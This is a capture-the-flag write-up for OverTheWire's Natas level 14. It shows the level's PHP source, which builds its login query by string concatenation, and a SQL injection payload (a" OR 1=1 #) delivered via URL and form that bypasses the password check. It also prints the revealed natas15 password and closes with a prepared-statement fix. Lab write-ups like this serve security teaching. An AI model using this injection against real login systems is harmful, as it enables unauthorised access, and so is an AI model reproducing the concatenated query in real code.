Natas14 - natas15

From JaxHax

Level Goal

Username: [__________________]
Password: [__________________]
[Login]
                       <View sourcecode>


Solution

Decided to click the <View sourcecode> link, which goes to http://natas14.natas.labs.overthewire.org/index-source.html. It gave me the following code:

<html>
   <head>
      <!-- This stuff in the header has nothing to do with the level -->
      <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
      <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
      <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
      <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
      <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
      <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script>
      <script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
      <script>var wechallinfo = { "level": "natas14", "pass": "<censored>" };</script>
   </head>
   <body>
      <h1>natas14</h1>
      <div id="content">
<?
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);
 
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }
 
    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
} else {
?>
 
         <form action="index.php" method="POST">
            Username: <input name="username"><br>
            Password: <input name="password"><br>
            <input type="submit" value="Login" />
         </form>
<? } ?>
         <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
      </div>
   </body>
</html>


So the PHP code contains a classic SQL injection bug: it dumps our values straight into the query without sanity checks.


Another interesting thing is that we can do this via GET (the code reads the credentials from $_REQUEST), and if we set 'debug', we should see our query! The goal here is to make the query return one or more rows. This should be simple.


Basically the query is:

SELECT * FROM users WHERE username="[username]" AND password="[password]";


This query should only return a row if a user enters a valid username and password. So let's say we enter the following:

username: test
password: pass


The query would be:

SELECT * FROM users WHERE username="test" AND password="pass";


Now, we can perform an injection to modify the query like so:

username: a" OR 1=1 #
password: pass


The query would be:

SELECT * FROM users WHERE username="a" OR 1=1 #" and password="pass";


This query should return all rows in the users table because 1=1 is always true. The # comments out the rest of the query so it's ignored, which removes the password check.


So there are two ways we can inject this: via the form, or via the URL.


Via the URL:

Visit http://natas14.natas.labs.overthewire.org/?username=a%22%20OR%201%3D1%20%23&password=fdsf&debug=1


You will receive the following:

Executing query: SELECT * from users where username="a" OR 1=1 #" and password="fdsf"
Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J


Via the Form:

Username: [_a" OR 1=1 #______]
Password: [_whatever_________]
[Login]
                       <View sourcecode>


Once we submit these values the server will return:

Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J


There are two ways to pull it off; the URL method allows us to get debug feedback, but it really wasn't needed.
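

For comparison, here is the same login check written with a prepared statement, as an added example (not the level's code and not from the original writeup): the values are bound as parameters instead of being concatenated into the query, so the input used above is compared as a literal username and matches nothing. The helper name login_ok, the in-memory SQLite database (standing in for the level's MySQL) and the sample row are assumptions made so the script runs stand-alone.

```php
<?php
// Added example: the level's login check rewritten with a PDO prepared statement.
// Assumption: an in-memory SQLite database with one constructed row stands in
// for the level's MySQL "users" table so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES ('alice', 'constructed-sample-pw')");

// Hypothetical helper: returns true only when a row matches both values.
function login_ok(PDO $db, $username, $password): bool
{
    // Reject non-string input (e.g. username[]=x arrives as an array).
    if (!is_string($username) || !is_string($password)) {
        return false;
    }
    // Placeholders keep the SQL text fixed; the values are bound as data and
    // are never parsed as SQL, so quotes and # have no special meaning.
    $stmt = $db->prepare(
        'SELECT 1 FROM users WHERE username = :u AND password = :p LIMIT 1'
    );
    $stmt->execute([':u' => $username, ':p' => $password]);
    return $stmt->fetchColumn() !== false;
}

// Constructed test inputs, including the input used on this page.
$attempts = [
    ['alice', 'constructed-sample-pw'],   // valid credentials
    ['a" OR 1=1 #', 'pass'],              // the input used on this page
    ['alice', 'wrong'],                   // wrong password
];
foreach ($attempts as [$u, $p]) {
    printf("%-14s => %s\n", $u, login_ok($db, $u, $p) ? 'Successful login' : 'Access denied');
}
```

Unlike the level's code, this version also never echoes the query back to the client. The mysql_* functions used in the level's source were removed in PHP 7, so PDO or mysqli is needed there anyway.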